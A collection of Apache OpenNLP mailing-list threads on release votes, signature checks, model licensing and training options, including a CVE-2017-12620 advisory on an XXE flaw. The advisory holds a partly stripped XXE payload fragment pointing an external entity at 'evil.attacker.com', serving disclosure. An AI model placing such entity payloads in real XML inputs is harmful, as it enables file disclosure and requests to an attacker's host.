Re: [VOTE] Apache OpenNLP 2.0.0 Release Candidate

2022-06-01 Thread Joern Kottmann
+1 binding

Thanks for all the work on this Jeff!

Cheers,
Jörn


On Wed, Jun 1, 2022 at 9:57 PM Suneel Marthi  wrote:

> +1 binding
>
> On Wed, Jun 1, 2022 at 3:12 PM Jeff Zemerick  wrote:
>
> > Just pinging folks on the thread about the active vote. The project has a
> > board report due in a week - it would be awesome to get this release in
> > that report.
> >
> > Thanks,
> > Jeff
> >
> > On Thu, May 26, 2022 at 9:39 AM Jeff Zemerick 
> > wrote:
> >
> > > I created a JIRA task to update the NOTICE file.
> > >
> > > I re-ran build tests and eval tests and am +1 to release as 2.0.0
> > >
> > > Thanks,
> > > Jeff
> > >
> > >
> > > On Tue, May 10, 2022 at 8:37 AM Jeff Zemerick 
> > > wrote:
> > >
> > >> Bruno,
> > >>
> > >> Good catch. Does updating the date require a new RC?
> > >>
> > >> Thanks for the reminder about the evaluation tests. Here's the output
> > log
> > >> from my run:
> > >>
> >
> https://gist.githubusercontent.com/jzonthemtn/02195c55a479c0c84102af0456331758/raw/a74aade3d605510f15c24098d13ebb9aa201c672/gistfile1.txt
> > >> (This was run on 1.9.5-SNAPSHOT before I did the release steps and the
> > >> version changed to 2.0.0.) I will also share how to run these tests.
> > >>
> > >> I am +1 for the release unless the NOTICE file is a blocker.
> > >>
> > >> Thanks,
> > >> Jeff
> > >>
> > >> On Mon, May 9, 2022 at 7:23 AM Bruno P. Kinoshita
> > >>  wrote:
> > >>
> > >>>  Hi Jeff,
> > >>> I think the NOTICE file needs to be adjusted to 2022?
> > >>>
> > >>>
> > >>>
> >
> https://github.com/apache/opennlp/blob/804ad5579b829f3a9b7b2bf3af819c53d6bb4290/NOTICE#L2https://github.com/apache/opennlp/blob/2.0.0/NOTICE#L2
> > >>>
> > >>> I downloaded a ZIP from Maven (opennlp-distr-2.0.0-bin.zip) and its
> > >>> NOTICE had 2017. At least in Apache Commons and Jena we try to keep
> the
> > >>> NOTICE file up to date (I think it's an ASF policy?)
> > >>>
> > >>> Building OK on
> > >>>
> > >>> Apache Maven 3.8.2 (ea98e05a04480131370aa0c110b8c54cf726c06f)
> > >>> Maven home: /opt/apache-maven-3.8.2
> > >>> Java version: 11.0.15, vendor: Private Build, runtime:
> > >>> /usr/lib/jvm/java-11-openjdk-amd64
> > >>> Default locale: en_US, platform encoding: UTF-8
> > >>> OS name: "linux", version: "5.4.0-109-generic", arch: "amd64",
> family:
> > >>> "unix"
> > >>>
> > >>> I don't know how to run the more complete test/models that others
> used
> > >>> to run for other releases. In case you know how to run that, it'd be
> > good
> > >>> if you could post in your vote saying whether everything worked fine.
> > >>> Otherwise check with another PMC/committer about it. Since it's a 2.0
> > >>> release I expect a few users curious about what's new trying out the
> > new
> > >>> code :)
> > >>>
> > >>> Thanks!
> > >>> Bruno
> > >>>
> > >>>
> > >>> On Monday, 9 May 2022, 12:26:50 am NZST, Jeff Zemerick <
> > >>> jzemer...@apache.org> wrote:
> > >>>
> > >>>  Hi folks,
> > >>>
> > >>> I have posted a first release candidate for the Apache OpenNLP 2.0.0
> > >>> release and it is ready for testing.
> > >>>
> > >>> The distributables can be downloaded from:
> > >>>
> > >>>
> >
> https://repository.apache.org/content/repositories/orgapacheopennlp-1029/org/apache/opennlp/opennlp-distr/2.0.0/
> > >>>
> > >>> The release was made from the Apache OpenNLP 2.0.0 tag at:
> > >>> https://github.com/apache/opennlp/tree/2.0.0
> > >>>
> > >>> To use it in a maven build set the version for opennlp-tools or
> > >>> opennlp-uima to 2.0.0 and add the following URL to your settings.xml
> > >>> file:
> > >>>
> > https://repository.apache.org/content/repositories/orgapacheopennlp-1029
> > >>>
> > >>> The release was made using the OpenNLP release process, documented on
> > the
> > >>> website:
> > >>> https://opennlp.apache.org/release.html
> > >>>
> > >>> Please vote on releasing these packages as Apache OpenNLP 2.0.0. The
> > vote
> > >>> is open for at least the next 72 hours.
> > >>>
> > >>> Only votes from OpenNLP PMC are binding, but everyone is welcome to
> > check
> > >>> the release candidate and vote. The vote passes if at least three
> > binding
> > >>> +1 votes are cast.
> > >>>
> > >>> [ ] +1 Release the packages as Apache OpenNLP [VERSION]
> > >>> [ ] -1 Do not release the packages because...
> > >>>
> > >>> Thanks!
> > >>> Jeff
> > >>>
> > >>
> > >>
> >
>


Re: [VOTE] Apache OpenNLP 1.9.3 Release Candidate

2020-07-29 Thread Joern Kottmann
+1 Release the packages as Apache OpenNLP 1.9.3

Jörn

On Wed, Jul 29, 2020 at 1:08 PM Tommaso Teofili
 wrote:
>
> +1 from me, build, sigs, tag look good.
>
> Regards,
> Tommaso
>
> On Tue, 28 Jul 2020 at 10:48, Bruno P. Kinoshita  wrote:
>
> > It worked after I imported keys from
> > https://dist.apache.org/repos/dist/release/opennlp/KEYS
> >
> > [x] +1 Release the packages as Apache OpenNLP 1.9.3
> >
> >
> > Thanks!
> > Bruno
> >
> >
> > On Monday, 27 July 2020, 12:00:29 am NZST, Jeff Zemerick <
> > jzemer...@apache.org> wrote:
> >
> >
> >
> >
> >
> > Looks like I'm in there as jzemerick. See if I'm doing this correctly:
> >
> > wget https://people.apache.org/keys/group/opennlp.asc
> > gpg --import https://people.apache.org/keys/group/opennlp.asc
> >
> > wget
> >
> > https://repository.apache.org/content/repositories/orgapacheopennlp-1027/org/apache/opennlp/opennlp-distr/1.9.3/opennlp-distr-1.9.3-bin.tar.gz
> > wget
> >
> > https://repository.apache.org/content/repositories/orgapacheopennlp-1027/org/apache/opennlp/opennlp-distr/1.9.3/opennlp-distr-1.9.3-bin.tar.gz.asc
> >
> > gpg --verify opennlp-distr-1.9.3-bin.tar.gz.asc
> > gpg: assuming signed data in 'opennlp-distr-1.9.3-bin.tar.gz'
> > gpg: Signature made Fri Jul 24 15:21:24 2020 UTC
> > gpg:using RSA key 6786BCFFBD2AE66E737FE97760E63AD841EF12D8
> > gpg: Good signature from "Jeff Zemerick (CODE SIGNING KEY) <
> > jzemer...@apache.org>" [unknown]
> > gpg: WARNING: This key is not certified with a trusted signature!
> > gpg:  There is no indication that the signature belongs to the
> > owner.
> > Primary key fingerprint: 6786 BCFF BD2A E66E 737F  E977 60E6 3AD8 41EF 12D8
> >
> > Jeff
> >
> >
> > On Sun, Jul 26, 2020 at 5:25 AM Bruno P. Kinoshita 
> > wrote:
> >
> > > Hi,
> > >
> > >
> > > Built successfully from tag with Java 8 on Ubuntu LTS. Had a look at one
> > > file from the dist area, and the contents looked OK (license, notice,
> > jars
> > > were using the right version 1.9.3 too).
> > >
> > >
> > > Also checked the signatures using some shell script I normally use, but
> > it
> > > failed to validate. I think it failed to find your key in
> > > https://people.apache.org/keys/group/opennlp.asc. Have you added your
> > key
> > > there? I search for Jeff and jzonthemtn, but couldn't find it.
> > >
> > >
> > > Cheers
> > >
> > > Bruno
> > >
> > >
> > >
> > > On Saturday, 25 July 2020, 11:08:12 pm NZST, Jeff Zemerick <
> > > jzemer...@apache.org> wrote:
> > >
> > >
> > >
> > >
> > >
> > > Hi folks,
> > >
> > > I have posted a 1st release candidate for the Apache OpenNLP 1.9.3
> > release
> > > and it is ready for testing.
> > >
> > > The distributables can be downloaded from:
> > >
> > >
> > https://repository.apache.org/content/repositories/orgapacheopennlp-1027/org/apache/opennlp/opennlp-distr/1.9.3/
> > >
> > > The release was made from the Apache OpenNLP 1.9.3 tag at:
> > > https://github.com/apache/opennlp/tree/opennlp-1.9.3
> > >
> > > To use it in a maven build set the version for opennlp-tools or
> > > opennlp-uima to 1.9.3 and add the following URL to your settings.xml
> > file:
> > > https://repository.apache.org/content/repositories/orgapacheopennlp-1027
> > >
> > > The release was made using the OpenNLP release process, documented on the
> > > website:
> > > https://opennlp.apache.org/release.html
> > >
> > > Please vote on releasing these packages as Apache OpenNLP 1.9.3. The vote
> > > is open for at least the next 72 hours.
> > >
> > > Only votes from OpenNLP PMC are binding, but everyone is welcome to check
> > > the release candidate and vote.
> > > The vote passes if at least three binding +1 votes are cast.
> > >
> > > [ ] +1 Release the packages as Apache OpenNLP 1.9.3
> > > [ ] -1 Do not release the packages because...
> > >
> > > Thanks!
> > >
> > > Jeff
> > >
> >


Re: license for opennlp 1.5 pre-trained models

2019-12-30 Thread Joern Kottmann
Hello,

The Apache OpenNLP project only distributes models that are licensed
under the AL 2.0 license, or models that comply with the strict
licensing requirements at Apache.
So far we only release a language detection model at the Apache OpenNLP project.

The OpenNLP project was hosted in the past at SourceForge and back
then there was also a release of various pre-trained models, but the
license situation for these models is unclear to me.
The problem is that the models are derived from copyright protected
corpora, and depending on the source the license for the corpus has a
clause about derived works from it.
The project back then was under the LGPL license, and I would believe
the intention was to release the models under the same license
(copyright holders of the corpora never complained but certainly
wouldn't agree).

Today we can train models on UT and release them under an open source
license, but this hasn't been done yet due to lack of contributions /
time from the maintainers.

Jörn


On Mon, Dec 30, 2019 at 9:33 PM Andrej Shadura  wrote:
>
> Hi,
>
> There’s a bunch of pre-trained 1.5 models available for download at the
> OpenNLP website, but they lack licensing information. Someone reuploaded
> them as Java JAR files to MvnRepository stating they’re Apache-2.0
> licensed, but I’m not sure that’s correct.
>
> I’m concerned because LanguageTool depends on these models, and I’m
> packaging it for Debian, and I need license clarity, since Debian
> doesn’t accept non-free files or files with unclear licensing.
>
> Could please somebody clarify this?
>
> Thanks!
>
> References
>  [1]: http://opennlp.sourceforge.net/models-1.5/
>  [2]: https://mvnrepository.com/artifact/edu.washington.cs.knowitall
>
> --
> Cheers,
>   Andrej


Re: OpenNLP 1.9.2 and Java 8/11

2019-12-15 Thread Joern Kottmann
+1 lgtm, it would be nice to track down the exact cause of the changes
on accuracy caused by the JDK update.
We had similar issues in the past e.g through things like the
undefined iteration order of Sets.

I am happy to help with this.

Jörn

On Sat, Dec 14, 2019 at 3:48 PM Tommaso Teofili
 wrote:
>
> +1
>
> Thanks Jeff!
>
> Il giorno sab 14 dic 2019 alle 15:32 Jeff Zemerick 
> ha scritto:
>
> > During preparation for a 1.9.2 release it was noticed that the current
> > master branch fails a few of the regression tests when built using OpenJDK
> > 11. (All tests pass when using OpenJDK 8.) Unless there are any significant
> > objections, the 1.9.2 release will be built using OpenJDK 8 and the task
> > [1] to address the failing regression tests on OpenJDK 11 will be addressed
> > in the next minor release.
> >
> > Thanks,
> > Jeff
> >
> > [1] https://issues.apache.org/jira/browse/OPENNLP-1285
> >


Re: KStem support?

2019-02-19 Thread Joern Kottmann
Hello,

we don't have it, but it would be nice to get a contribution for it.

Jörn

On Thu, Feb 7, 2019 at 3:03 PM Benedict Holland
 wrote:
>
> Hello all,
>
> I just happened to read a Solr message about using KStem. Is there any
> support for this particular stemmer or would you like there to be?
>
> Thanks,
> ~Ben


Re: [VOTE] Apache OpenNLP 1.9.0 Release Candidate 2

2018-06-29 Thread Joern Kottmann
+1

Jörn

On Fri, Jun 29, 2018 at 1:45 PM, Jeff Zemerick  wrote:
> Hi folks,
>
> I have posted a 2nd release candidate for the Apache OpenNLP 1.9.0 release
> and it is ready for testing.
>
> The distributables can be downloaded from:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1022/org/apache/opennlp/opennlp-distr/1.9.0/
>
> The release was made from the Apache OpenNLP 1.9.0 RC2 tag at:
> https://github.com/apache/opennlp/tree/opennlp-1.9.0-rc2
>
> To use it in a maven build set the version for opennlp-tools or
> opennlp-uima to 1.9.0 and add the following URL to your settings.xml file:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1022
>
> The release was made using the OpenNLP release process, documented on the
> website:
> https://opennlp.apache.org/release.html
>
> Please vote on releasing these packages as Apache OpenNLP 1.9.0. The vote
> is open for at least the next 72 hours.
>
> Only votes from OpenNLP PMC are binding, but everyone is welcome to check
> the release candidate and vote.
> The vote passes if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP 1.9.0
> [ ] -1 Do not release the packages because...
>
> Thanks!
> Jeff


Re: Custom models (for Ukrainian and Russian languages)

2018-06-28 Thread Joern Kottmann
Hello,

we would be happy to hear about your experience. Did the language
detector perform well enough on Russian/Ukrainian texts?

To reproduce the models we train you should download the data via svn:
svn co https://svn.apache.org/repos/bigdata/opennlp/trunk opennlp-corpus

Note the corpus is quite large and it contains instructions on how to
train on it.

HTH,
Jörn


On Sat, Jun 23, 2018 at 4:59 PM, Anton Matsiuk  wrote:
> Hi!
> I am willing to reach you to get or make some custom models for Ukrainian
> and Russian languages.
> We have tried Language Detector model, and, with future customisation,
> we're thinking that it is AWESOME.
> Thank you for what you're doing.
>
> Am I writing to the right addressee?
> Maybe I should get in touch with Leipzig personnel?
> Here: http://wortschatz.uni-leipzig.de/en/contact
> or here: http://asv.informatik.uni-leipzig.de/de/staff
>
> Thank you again.
> Waiting for an answer from you.


Re: OPENNLP-912 : Add a rule based sentence detector

2018-04-06 Thread Joern Kottmann
Hello,

could you elaborate a bit on the approach?

Jörn

On Tue, Apr 3, 2018 at 5:24 PM, Isuranga Perera
 wrote:
> Hi All,
>
> I would like to contribute $subject feature. Appreciate if anyone can guide
> me through the process.
>
> Best Regards
> Isuranga Perera


Re: [VOTE] Apache OpenNLP 1.8.4 Release Candidate

2017-12-23 Thread Joern Kottmann
+1

Jörn

On Dec 21, 2017 15:44, "Jeff Zemerick"  wrote:

> Hi Folks,
>
> I have posted a first release candidate for the Apache OpenNLP 1.8.4
> release and it is ready for testing.
>
> The RC1 distributables can be downloaded from here:
> https://repository.apache.org/content/repositories/
> orgapacheopennlp-1020/org/apache/opennlp/opennlp-distr/1.8.4
>
> The release was made from the Apache OpenNLP 1.8.4 tag at
> https://github.com/apache/opennlp/tree/opennlp-1.8.4
>
> To use it in a maven build set the version for opennlp-tools or
> opennlp-uima to 1.8.4 and add the following URL to your settings.xml file:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1020
>
> The release was made using the OpenNLP release process, documented on the
> Wiki here:
> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>
> The release contains quite some changes, please refer to the contained
> issue list for details.
>
> Please vote on releasing these packages as Apache OpenNLP 1.8.4. The vote
> is
> open for at least the next 72 hours.
>
> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
> release candidate and voice their approval or disapproval. The vote passes
> if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP 
> [ ] -1 Do not release the packages because...
>
> Thanks!
> Jeff Zemerick
>


Re: [VOTE] Language Detector model for Apache OpenNLP 1.8.3 Release Candidate 3

2017-10-30 Thread Joern Kottmann
+1

Jörn

On Mon, Oct 30, 2017 at 2:30 PM, William Colen  wrote:
> The Apache OpenNLP PMC would like to call for a Vote on the Language
> Detector model for Apache OpenNLP 1.8.3 Release Candidate 3.
>
> The Release artifacts can be downloaded from:
>
> http://people.apache.org/~colen/models/langdetect-183/rc3/
>
> The model was built with Apache OpenNLP 1.8.3 release, trained with a
> portion of the Leipzig corpus, which can be found under this  tag:
>
> https://svn.apache.org/repos/bigdata/opennlp/tags/langdetect-183_RC3
>
> The model binary includes the NOTICE, LICENSE and also a README with
> details of supported languages, how the Leipzig corpus was created and the
> model was trained. For your convenience the README is available here:
>
> https://svn.apache.org/repos/bigdata/opennlp/tags/langdetect-183_RC3/leipzig/resources/README.txt
>
> A detailed evaluation report is available here:
>
> http://people.apache.org/~colen/models/langdetect-183/rc3/langdetect-183.bin.report.txt
>
> To use Language Detector, please follow the documentation here:
>
> http://opennlp.apache.org/docs/1.8.3/manual/opennlp.html#tools.langdetect
>
> It is important to note that this model is trained for and works well with
> longer texts that have at least 2 sentences or more from the same language.
>
> The artifacts have been signed with the Key - 524A9649
>  found at
>
> http://people.apache.org/keys/group/opennlp.asc
>
> Please vote on releasing the model as Apache OpenNLP Language Detector
> Model 1.8.3. The vote is open for either the next 72 hours or a minimum of
> 3 +1 PMC binding votes
> whichever happens earlier.
>
> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
> release candidate and voice their approval or disapproval. The vote passes
> if at least three binding +1 votes are cast.
>
> [ ] +1 Release the packages as Apache OpenNLP Language Detector Model 1.8.3
>
> [ ] -1 Do not release the packages because...
>
> Thanks again to all the committers and contributors for their work over the
> past few weeks.


Re: [VOTE] Apache OpenNLP 1.8.3 Release Candidate

2017-10-26 Thread Joern Kottmann
+1

Jörn

On Thu, Oct 26, 2017 at 10:18 AM, Rodrigo Agerri  wrote:
> +1 (binding)
>
> -eval and unit tests OK
>
> On Wed, Oct 25, 2017 at 7:01 PM, William Colen  
> wrote:
>> +1 binding
>>
>> - eval tests ok
>> - unit test ok
>> - build from tag ok
>> - distribution execution ok
>> - distribution ok
>>
>>
>>
>> 2017-10-25 14:46 GMT-02:00 Tommaso Teofili :
>>
>>> +1 (binding)
>>>
>>> - source build from tag ok
>>> - sigs and checks ok
>>>
>>> Il giorno mer 25 ott 2017 alle ore 18:09 Steve Blackmon <
>>> sblack...@apache.org> ha scritto:
>>>
>>> >  +1 non-binding
>>> >
>>> > - source builds, tests pass
>>> > - verified checksums and signatures
>>> >
>>> > Steve Blackmon
>>> > sblack...@apache.org
>>> >
>>> > On Oct 25, 2017 at 10:17 AM, Dan Russ  wrote:
>>> >
>>> >
>>> > +1 burrito
>>> >
>>> > ran units test on my downstream code that uses opennlp-tools.
>>> >
>>> > On Oct 25, 2017, at 6:58 AM, Suneel Marthi  wrote:
>>> >
>>> > +1 binding
>>> >
>>> > 1. Verified Sigs and hashes
>>> > 2. Ran a clean build from {src} * {zip, tar}
>>> > 3. All unit tests pass
>>> >
>>> > On Wed, Oct 25, 2017 at 3:08 PM, Bruno P. Kinoshita <
>>> > brunodepau...@yahoo.com.br.invalid> wrote:
>>> >
>>> > [ X ] +1 Release the packages as Apache OpenNLP 1.8.3
>>> >
>>> > `mvn clean test install` working fine, checked artefacts signatures,
>>> > matching with what was in the vote e-mail.
>>> >
>>> > Currently on tag 1.8.3, commit b317159cb9857dc509c08a31a98dc61209f39bff
>>> >
>>> > Thanks for preparing this release.
>>> >
>>> > Cheers
>>> > Bruno
>>> >
>>> >
>>> >
>>> > 
>>> > From: Suneel Marthi 
>>> > To: dev@opennlp.apache.org; us...@opennlp.apache.org
>>> > Sent: Tuesday, 24 October 2017 10:29 PM
>>> > Subject: [VOTE] Apache OpenNLP 1.8.3 Release Candidate
>>> >
>>> >
>>> >
>>> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
>>> >
>>> > 1.8.3 Release Candidate.
>>> >
>>> >
>>> > The Release artifacts can be downloaded from:
>>> >
>>> >
>>> > https://repository.apache.org/content/repositories/orgapache
>>> >
>>> > opennlp-1010/org/apache/opennlp/opennlp-distr/1.7.2/
>>> >
>>> >
>>> > The release was made from the Apache OpenNLP 1.8.3 tag at
>>> >
>>> >
>>> > https://github.com/apache/opennlp/tree/opennlp-1.8.3
>>> >
>>> >
>>> > To use it in a maven build set the version for opennlp-tools or
>>> > opennlp-uima
>>> >
>>> > to 1.8.3
>>> >
>>> >
>>> > and add the following URL to your settings.xml file:
>>> >
>>> >
>>> > https://repository.apache.org/content/repositories/
>>> > orgapacheopennlp-1019/org/apache/opennlp/opennlp-distr/1.8.3/
>>> >
>>> >
>>> > The artifacts have been signed with the Key - D3541808 found at
>>> >
>>> >
>>> > http://people.apache.org/keys/group/opennlp.asc
>>> >
>>> >
>>> > Please vote on releasing these packages as Apache OpenNLP 1.8.3. The vote
>>> > is
>>> >
>>> >
>>> > open for either the next 72 hours or a minimum of 3 +1 PMC binding votes
>>> >
>>> > whichever happens earlier.
>>> >
>>> >
>>> > Only votes from OpenNLP PMC are binding, but folks are welcome to check
>>> the
>>> >
>>> >
>>> > release candidate and voice their approval or disapproval. The vote
>>> passes
>>> >
>>> >
>>> > if at least three binding +1 votes are cast.
>>> >
>>> >
>>> > [ ] +1 Release the packages as Apache OpenNLP 1.8.3
>>> >
>>> >
>>> > [ ] -1 Do not release the packages because...
>>> >
>>> >
>>> > Thanks again to all the committers and contributors for their work
>>> >
>>> > over the past
>>> >
>>> > few weeks.
>>> >
>>>


[ANNOUNCE] CVE-2017-12620: Apache OpenNLP XXE vulnerability

2017-10-02 Thread Joern Kottmann
Severity: Medium


Vendor:
The Apache Software Foundation


Versions Affected:
OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1


Description:
When loading models or dictionaries that contain XML it is possible to
perform an XXE attack, since OpenNLP is a library, this only affects
applications that load models or dictionaries from untrusted sources.



Mitigation:
All users who load models or XML dictionaries from untrusted sources
should update to 1.8.2.


Example:

An attacker can place this:


http://evil.attacker.com/;>
]>


Inside one of the XML files, either a dictionary or embedded inside a
model package, to demonstrate this vulnerability.


Credit:
This issue was discovered by Nishil Shah of Salesforce.


Regards,
Jörn Kottmann


Re: [VOTE] Apache OpenNLP 1.8.2 Release Candidate 2

2017-09-15 Thread Joern Kottmann
The vote passed, only +1 votes were received.

The following voted +1:
Tommaso Teofili
Suneel Marthi
Jörn Kottmann
Daniel Russ
Jeff Zemerick
Richard Eckart de Castilho
William Colen
Peter Thygesen

Thanks for voting!

Jörn

On Wed, Sep 13, 2017 at 8:31 PM, Peter Thygesen
<peter.thyge...@gmail.com> wrote:
> Vote: +1 binding
>
>
>> On 11 Sep 2017, at 09.12, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> Hi Folks,
>>
>>
>> I have posted a second release candidate for the Apache OpenNLP 1.8.2
>> release and it is ready for testing.
>>
>>
>> The RC 2 distributables can be downloaded from here:
>> https://repository.apache.org/content/repositories/orgapacheopennlp-1018/org/apache/opennlp/opennlp-distr/1.8.2/
>>
>>
>> The release was made from the Apache OpenNLP 1.8.2 tag at
>> https://github.com/apache/opennlp/tree/opennlp-1.8.2
>>
>>
>> To use it in a maven build set the version for opennlp-tools or
>> opennlp-uima to 1.8.2 and add the following URL to your settings.xml
>> file:
>> https://repository.apache.org/content/repositories/orgapacheopennlp-1018
>>
>> The release was made using the OpenNLP release process, documented on
>> the Wiki here:
>> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>>
>> The release contains quite some changes, please refer to the contained
>> issue list for details.
>>
>>
>> Please vote on releasing these packages as Apache OpenNLP 1.8.2. The vote is
>> open for at least the next 72 hours.
>>
>>
>> Only votes from OpenNLP PMC are binding, but folks are welcome to check the
>> release candidate and voice their approval or disapproval. The vote passes
>> if at least three binding +1 votes are cast.
>>
>>
>> [ ] +1 Release the packages as Apache OpenNLP 1.8.2
>> [ ] -1 Do not release the packages because...
>>
>>
>> Thanks!
>>
>> Jörn
>>
>> P.S. Here is my +1.
>


[VOTE] Apache OpenNLP 1.8.2 Release Candidate 2

2017-09-11 Thread Joern Kottmann
Hi Folks,


I have posted a second release candidate for the Apache OpenNLP 1.8.2
release and it is ready for testing.


The RC 2 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-1018/org/apache/opennlp/opennlp-distr/1.8.2/


The release was made from the Apache OpenNLP 1.8.2 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.2


To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.2 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-1018

The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process

The release contains quite some changes, please refer to the contained
issue list for details.


Please vote on releasing these packages as Apache OpenNLP 1.8.2. The vote is
open for at least the next 72 hours.


Only votes from OpenNLP PMC are binding, but folks are welcome to check the
release candidate and voice their approval or disapproval. The vote passes
if at least three binding +1 votes are cast.


[ ] +1 Release the packages as Apache OpenNLP 1.8.2
[ ] -1 Do not release the packages because...


Thanks!

Jörn

P.S. Here is my +1.


Re: [VOTE] Apache OpenNLP 1.8.2 Release Candidate

2017-09-07 Thread Joern Kottmann
I am canceling the vote. The SourceForgeEval test is not running due
to an incorrect checksum for the training data.
Lets fix this and create one more RC.

Jörn

On Wed, Sep 6, 2017 at 8:38 PM, Jeff Zemerick <jzemer...@apache.org> wrote:
> +1 binding
>
> Built from tag.
> Ran the eval tests.
>
> On Wed, Sep 6, 2017 at 2:17 PM, Madhawa Kasun Gunasekara <
> madhaw...@gmail.com> wrote:
>
>> +1 (non-binding)
>>
>> Madhawa
>>
>> On Wed, Sep 6, 2017 at 1:15 PM, Peter Thygesen <peter.thyge...@gmail.com>
>> wrote:
>>
>> > +1 binding
>> >
>> > /PEter Thygesen
>> >
>> > > On 4 Sep 2017, at 23.41, Joern Kottmann <jo...@apache.org> wrote:
>> > >
>> > > Hi Folks,
>> > >
>> > >
>> > > I have posted a first release candidate for the Apache OpenNLP 1.8.2
>> > > release and it is ready for testing.
>> > >
>> > >
>> > > The RC 1 distributables can be downloaded from here:
>> > > https://repository.apache.org/content/repositories/
>> > orgapacheopennlp-1017/org/apache/opennlp/opennlp-distr/1.8.2/
>> > >
>> > >
>> > > The release was made from the Apache OpenNLP 1.8.2 tag at
>> > > https://github.com/apache/opennlp/tree/opennlp-1.8.2
>> > >
>> > >
>> > > To use it in a maven build set the version for opennlp-tools or
>> > > opennlp-uima to 1.8.2 and add the following URL to your settings.xml
>> > > file:
>> > > https://repository.apache.org/content/repositories/
>> orgapacheopennlp-1017
>> > >
>> > > The release was made using the OpenNLP release process, documented on
>> > > the Wiki here:
>> > > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>> > >
>> > > The release contains quite some changes, please refer to the contained
>> > > issue list for details.
>> > >
>> > >
>> > > Please vote on releasing these packages as Apache OpenNLP 1.8.2. The
>> > vote is
>> > > open for at least the next 72 hours.
>> > >
>> > >
>> > > Only votes from OpenNLP PMC are binding, but folks are welcome to check
>> > the
>> > > release candidate and voice their approval or disapproval. The vote
>> > passes
>> > > if at least three binding +1 votes are cast.
>> > >
>> > >
>> > > [ ] +1 Release the packages as Apache OpenNLP 1.8.2
>> > > [ ] -1 Do not release the packages because...
>> > >
>> > >
>> > > Thanks!
>> > >
>> > > Jörn
>> > >
>> > > P.S. Here is my +1.
>> >
>> >
>>


[VOTE] Apache OpenNLP 1.8.2 Release Candidate

2017-09-04 Thread Joern Kottmann
Hi Folks,


I have posted a first release candidate for the Apache OpenNLP 1.8.2
release and it is ready for testing.


The RC 1 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-1017/org/apache/opennlp/opennlp-distr/1.8.2/


The release was made from the Apache OpenNLP 1.8.2 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.2


To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.2 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-1017

The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process

The release contains quite some changes, please refer to the contained
issue list for details.


Please vote on releasing these packages as Apache OpenNLP 1.8.2. The vote is
open for at least the next 72 hours.


Only votes from OpenNLP PMC are binding, but folks are welcome to check the
release candidate and voice their approval or disapproval. The vote passes
if at least three binding +1 votes are cast.


[ ] +1 Release the packages as Apache OpenNLP 1.8.2
[ ] -1 Do not release the packages because...


Thanks!

Jörn

P.S. Here is my +1.


Re: Early stopping NameFinderME

2017-08-29 Thread Joern Kottmann
Go ahead and do the change. Otherwise I can work on it tomorrow.

Jörn

On Tue, Aug 29, 2017 at 4:38 PM, Dan Russ <danrus...@gmail.com> wrote:
> Hi Jörn,
>I don’t see a problem with it.  Make sure the default is set to the 
> current value.  Are you making the fix?  I could get to it later tonight.
> Daniel
>
>> On Aug 29, 2017, at 10:32 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>>
>> Hi Daniel,
>>
>> do you see any issue if we expose LLThreshold and allow the user to
>> change it via training parameters?
>>
>> Jörn
>>
>> On Sat, Aug 26, 2017 at 1:07 AM, Daniel Russ <danrus...@gmail.com> wrote:
>>> Jörn,
>>>
>>>   Currently, GISTrainer has a private static final variable LLThreshold, 
>>> which controls if the change in the log likelihood between two iterations 
>>> is too small.  We could make this parameter. I am concerned about using the 
>>> accuracy to train the model.  If we use accuracy, the weight space may be 
>>> flat.
>>>
>>>   Saurabh, you use the term “early stopping”.  In deep learning, early 
>>> stopping is used to prevent overtraining and improve generalization to 
>>> unseen data.  I am not sure early stopping serves the same purpose with GIS 
>>> training.  Does anyone know if early stopping improves generalization for a 
>>> maxent problem?
>>>
>>> Daniel
>>>
>>>> On Aug 24, 2017, at 4:48 AM, Joern Kottmann <kottm...@gmail.com> wrote:
>>>>
>>>> You are the first one who ever asked this question. I think we have this as
>>>> an option already on the gis trainer but it is not exposed all the way
>>>> through.
>>>>
>>>> Please open a jira and I can look at it next week.
>>>>
>>>> Jörn
>>>>
>>>> On Aug 21, 2017 5:11 PM, "Saurabh Jain" <saurabh4768j...@gmail.com> wrote:
>>>>
>>>>> Hi All
>>>>>
>>>>> How can we use early stopping while training/crossvalidating custom data
>>>>> with NameFinder ? What I want if change in likelihood value or accuracy of
>>>>> model is less than 0.05 between two steps (differ by 5 i.e compare x+5 
>>>>> step
>>>>> output with x step) then training should stop. I could not find anything
>>>>> regarding this in documentation. Can some one please help ?
>>>>>
>>>>> --
>>>>> *Thanks & Regards*
>>>>>
>>>>>
>>>>> *Saurabh Jain *
>>>>> *AI Developer*
>>>>>
>>>>> *Active Intelligence  *
>>>>>
>>>>> *"*
>>>>> *To do a thing yesterday was the best time . Second best time is today .” 
>>>>> *
>>>>>
>>>
>


Re: Early stopping NameFinderME

2017-08-29 Thread Joern Kottmann
Hi Daniel,

do you see any issue if we expose LLThreshold and allow the user to
change it via training parameters?

Jörn

On Sat, Aug 26, 2017 at 1:07 AM, Daniel Russ <danrus...@gmail.com> wrote:
> Jörn,
>
